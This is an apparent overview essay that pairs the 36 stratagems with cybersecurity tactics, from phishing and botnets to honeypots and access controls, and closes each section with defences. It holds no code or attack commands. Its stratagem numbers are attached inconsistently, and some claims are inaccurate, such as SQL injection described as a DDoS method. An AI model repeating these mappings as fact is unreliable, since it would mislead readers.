Many of the 36 stratagems could utilize cybersecurity tools and tactics to carry out or counter the cunning ploys:
Hacking/malware (Stratagems 3, 13, 18, 21) - Spyware, phishing, network intrusions to steal data for intelligence gathering, disruption, or extortion.
Social engineering (Stratagems 1, 4, 10, 31) - Manipulating human targets via impersonation, baiting, and other tricks to breach security.
OSINT (Stratagems 12, 15, 17) - Leveraging open source intel like social media to gain information advantages.
Encryption (Stratagems 21, 33) - Encrypting communications and data storage to enable covert coordination.
Anonymity (Stratagems 5, 23) - Using VPNs, Tor, crypto to mask online identities and activities.
Propaganda (Stratagems 9, 14, 26) - Spreading mis/disinformation via bots, fake accounts, media manipulation.
DDoS (Stratagems 6, 20) - Launching distributed denial of service attacks to disrupt and distract targets.
Honeypots (Stratagems 16, 28) - Set up decoy systems to study methods of attackers.
Access controls (Stratagems 22, 30) - Strictly controlling access to systems and data to secure power.
Monitoring (Stratagems 3, 13, 18) - Logging, sniffing, auditing to detect anomalous activities.
Countermeasures would utilize tools like intrusion prevention, firewalls, threat intel, access controls, auditing logs, user training, and building redundancy.
Hacking techniques and malware can serve a variety of functions aligned with different stratagems:
Espionage - Malware like spyware (Stratagems 3, 13, 18) can be used to gather intelligence by stealing data from target systems. Advanced persistent threats (APTs) can lurk in networks long-term to monitor activities and exfiltrate sensitive information.
Disruption - Strategic hacking to take down infrastructure (Stratagems 6, 20) can serve as a distraction or denial of service. Wiper malware that destroys data is an example. The attack on Sony Pictures in 2014 wiped out massive amounts of data and disrupted operations.
Extortion - Ransomware (Stratagem 5) can encrypt files until the victim pays a ransom to decrypt. The Colonial Pipeline attack shut down oil delivery briefly until an extortion payment was made.
Botnets - By compromising many systems, botnets can enable DDoS attacks, cryptojacking, or propaganda distribution (Stratagems 9, 14, 26). The Mirai botnet took down DNS provider Dyn in 2016.
Infrastructure - Compromising key infrastructure through supply chain attacks could enable future access and control (Stratagems 16, 22, 30). The SolarWinds breach gave access to US government agencies.
Defensive measures include keeping systems patched and updated, access controls, malware scans, penetration testing, monitoring for anomalies, employee security training, and maintaining offline backups. Offensive cyber capabilities require great care in use to avoid escalations.
Social engineering relies on manipulating human psychology and emotions rather than technical hacks to breach security. This aligns with several deception-based stratagems:
Impersonation - Attackers pretend to be trusted entities like IT staff to trick users into granting access or sharing sensitive info (Stratagem 1). Highly targeted spearphishing often starts with impersonation.
Baiting - Enticements like USB drives are left in public places. Curiosity tempts victims to plug them in, unleashing malware (Stratagem 4). Iran used this in its nuclear enrichment facility attack.
Pretexting - Creating a scenario to coerce info, like pretending to need data for an audit. LinkedIn profiles provide pretexting ammo (Stratagem 10).
Phishing - Mass emails pretending to be legit lure users to input credentials on fake sites (Stratagem 31). High open rates show it works.
Quid Pro Quo - Offering a small gift urges reciprocation. The CIA sent SD cards to targets in Lebanon as gifts then monitored them remotely when inserted (Stratagem 17).
Tailgating - Following authorized people through secured doors. Hides in plain sight (Stratagem 23).
Defenses include security awareness training for employees, email hygiene like sender verification, restricting USB devices, physical access controls, monitoring anomalous behavior, and independent verification procedures. Social engineering exploits human tendencies rather than technical flaws, so training is essential.
Publicly available information can offer valuable intelligence to inform influence operations and hacking targets:
Social media prowling - Profiles provide personal info, photos revealing locales, affiliations, opinions (Stratagems 12,15). Facebook searches aided Russian interference in 2016 US elections.
Public records - Valuable for reconnaissance on targets. Google hacking leverages exposed documents like court filings, property records, and patents (Stratagem 17).
Metadata - Info like geotags, account names, and timestamps embedded in files. Provides context for attacks or uncovers associations (Stratagem 33).
Online forums - Discussions reveal insider lingo, technical details, frustrations that can enable social engineering (Stratagem 4). Hackers lurk in forums like Reddit.
Code repositories - Sites like GitHub contain vulnerable code snippets, useful tools, planning details developers forget to remove. Great for reconnaissance (Stratagem 13).
Job sites - Resumes and profiles provide detailed work history, skillsets, affiliations, contacts, etc. to spearphish targets (Stratagem 10).
Leaked data - Breaches dump piles of data, like account credentials, for public misuse. Enables access and further attacks (Stratagems 3, 18).
Defenses include being judicious in sharing personal information publicly online, locking down social media privacy settings, monitoring public data exposure, and assuming anything online may be leveraged for influence campaigns. Offensive OSINT requires careful ethics around privacy and transparency.
Strong encryption provides crucial protection for covert coordination and operations:
Secure comms - Encrypted communications like PGP email, Signal, WhatsApp protect against surveillance (Stratagems 21, 33). Prevent interception of instructions and intelligence sharing.
Anonymity - Cryptocurrencies like Bitcoin enable anonymous payments. Combined with encryption makes tracking difficult (Stratagem 5). Ransomware demands crypto.
Data security - Powerful encryption applied properly secures sensitive data even if stolen. Frustrates espionage (Stratagems 13, 18). Proper crypto defeated FBI in Apple case.
Code obscurity - Obfuscating malware code via encryption and polymorphism complicates analysis and detection (Stratagem 32). Slows reverse engineering.
Digital signatures - Public key crypto proves authenticity and integrity of messages or files (Stratagem 10). Ensures they are unaltered.
Access controls - Encryption complements access controls by strictly limiting decryption ability based on keys or credentials (Stratagems 22, 30). Enforces information compartmentalization.
Proper key management is essential to maintain security. Use well-vetted algorithms like AES and RSA. Quantum computing raises future risks to break encryption via brute force. Defense depends on multilayered controls, not just crypto.
Maintaining anonymity online facilitates covert operations:
VPNs - Virtual Private Networks tunnel and encrypt traffic, hiding IPs and physical locations (Stratagems 5, 23). Allows access from blocked regions. Critical for evading surveillance.
Tor - Routes traffic through layers of encrypted hops to anonymize activity (Stratagems 16, 21). Used by hackers, activists, whistleblowers.
Disposable emails - Temporary anonymous email services like Guerrilla Mail enable opening anonymous social media or messaging accounts (Stratagem 31). No real identity needed.
Cryptocurrency - In addition to enabling anonymous payments, crypto allows anonymous registration on platforms demanding registration (Stratagems 7, 17).
OS tools - Tails Linux boots from USB with forced encryption and routing through Tor. Qubes OS quarantines all activity (Stratagem 28).
MAC spoofing - Changing a device's MAC address hides it from network monitoring and access controls tied to device IDs (Stratagem 3).
Chain proxies - Chaining together multiple proxy servers/hops disguises traffic origin (Stratagems 12, 33). Each sees only the next hop.
Defenses include monitoring network traffic for VPN/Tor use, implementing strict access controls based on roles, and behavioral analytics to detect anomalies suggesting account misuse. Multifactor authentication and device fingerprinting also help counter the anonymity risk.
Propaganda distributed online or through media channels serves several deception-based goals:
Misinformation - Fabricating information or cherry-picking data to intentionally deceive target audiences (Stratagems 1, 10). Used heavily in Russian interference.
Disinformation - Spreading deliberately false information to sow confusion (Stratagems 6, 20). Makes it harder to discern truth.
Divisive narratives - Framing content in emotional ways that inflame tensions and polarize groups (Stratagems 9, 14, 33). Exploits societal divides.
Bot nets - Automated accounts that rapidly amplify narratives and drown out real debate on social media (Stratagems 26, 32). Creates illusion of consensus.
Media manipulation - Directly editing outlet content or restrictions to control narratives (Stratagem 16). Seen in state-run media outlets.
Deepfakes - AI-generated fake video/audio of world leaders or celebrities saying anything. High potential to deceive (Stratagem 4).
Astroturfing - Creating illusion of grassroots support for ideas by masking coordinated activity as organic (Stratagem 23). Used heavily by corporations.
Defenses include verifying sources, fostering critical thinking skills, diverse independent media, fact checking, moderating hate speech, requiring validation of bot accounts, and formalizing manipulation into cybercrime laws. Offensive propaganda requires strong ethics to avoid deceiving and harming populations.
Distributed denial of service (DDoS) attacks overwhelm targets with traffic to disable access:
Volume attacks - Flood bandwidth with junk traffic to crash servers and degrade network capacity (Stratagems 6, 20). Easy to execute but attacks are short.
Protocol attacks - Exploit inherent protocols like TCP, UDP, and DNS at scale to drain resources (Stratagems 5, 16). SSDP and NTP amplifications effective.
Application attacks - Target application layer with forged requests and scripts to overload servers and databases (Stratagems 13, 18). SQL injections crash databases.
Bit and piece attacks - Low and slow traffic blends into noise but taxes firewalls and IPS appliances (Stratagem 4). Challenging to detect.
Breach attacks - Compromise devices into botnets to launch much larger DDoS from distributed sources (Stratagems 3, 32). Boosts attack size.
Objectives vary from distraction, disruption, taking down infrastructure, crippling defenses, and obscuring other hacking activity. DDoS tactics continue evolving using encrypted, multi-vector, and pulse wave methods.
Defenses include overprovisioning bandwidth, implementing DDoS prevention services, restricting traffic sources, having contingency plans ready, and maintaining internet exchange points for traffic scrubbing.
Honeypots are decoy systems designed to attract and study attackers:
Distraction - High-interaction honeypots emulate real systems to divert and occupy adversary time and focus (Stratagems 16, 28).
Detection - Any activity in the isolated honeypot indicates malicious reconnaissance and probing (Stratagem 13). Quickly exposes methods.
Intelligence - Detailed logging reveals tactics, tools, and objectives by safely letting attacks proceed in the contained honeypot (Stratagems 3, 18).
Dilution - Flooding attackers with honeypots wastes time and resources attempting to compromise fake assets (Stratagem 4).
Deception - Fake data in honeypots masks real valued assets and provides believable but useless intelligence to attackers (Stratagems 10, 17).
Honeypots must be carefully monitored and isolated. They carry risks if compromised themselves. Highly-skilled attackers may detect and avoid them. Integrating honeypots within a larger defense system provides supplemental detection and intelligence on attacks.
Managing access to systems and data is crucial for maintaining control:
Authentication - Requiring usernames/passwords, multi-factor authentication, biometrics, etc. to validate identity and authorize access (Stratagems 22, 30).
Least privilege - Only granting the minimum access needed for specific roles and responsibilities limits exposure (Stratagem 25).
Compartmentalization - Segmenting and restricting access to certain projects and activities aids secrecy (Stratagem 33).
Time controls - Limiting when users can login narrows exposure, like disabling accounts after-hours (Stratagem 23).
Remote access - Requiring VPNs, zero trust models, IP whitelisting controls entry points attackers target (Stratagems 5, 21).
Behavioral - Analyzing patterns like time, location, activities detects anomalies suggesting account misuse or insider threats (Stratagem 18).
Perimeter - Firewalls, allowlisting, microsegmentation, DMZ zones control traffic and access between network segments (Stratagems 12, 15).
Physical - Video surveillance, guards, badges, biometrics manage physical access to facilities housing systems (Stratagem 28).
Applying the principles of least privilege and zero trust networking are key. Audit logs should monitor access. Controls must be flexible enough for legitimate usage.
Continuous monitoring of networks, systems, and user activities is crucial for detection:
Network - Traffic monitoring, IDS/IPS detects network anomalies and known attack patterns (Stratagems 3, 13). Essential on perimeters.
Endpoints - Server and endpoint monitoring tracks activities, configuration changes, and events for anomalies (Stratagems 18, 25). Critical inside networks.
User - Logging and analyzing user actions like logins and data access spots insider threats (Stratagem 21). Requires feeding logs to a SIEM.
Application - Application layer monitoring examines transactions for signs of abuse, data exfiltration, or fraud (Stratagems 5, 17).
Audit logs - Audit logs from systems and authentication servers should feed into monitoring and analytics (Stratagems 23, 32).
Security analytics - Machine learning applied to large datasets helps surface abnormal incidents that require investigation (Stratagems 4, 16).
Monitoring and logging require retention policies, redundancy, and protection to preserve evidence in case of anti-forensics attempts. They generate massive data requiring thoughtful analysis to avoid information overload.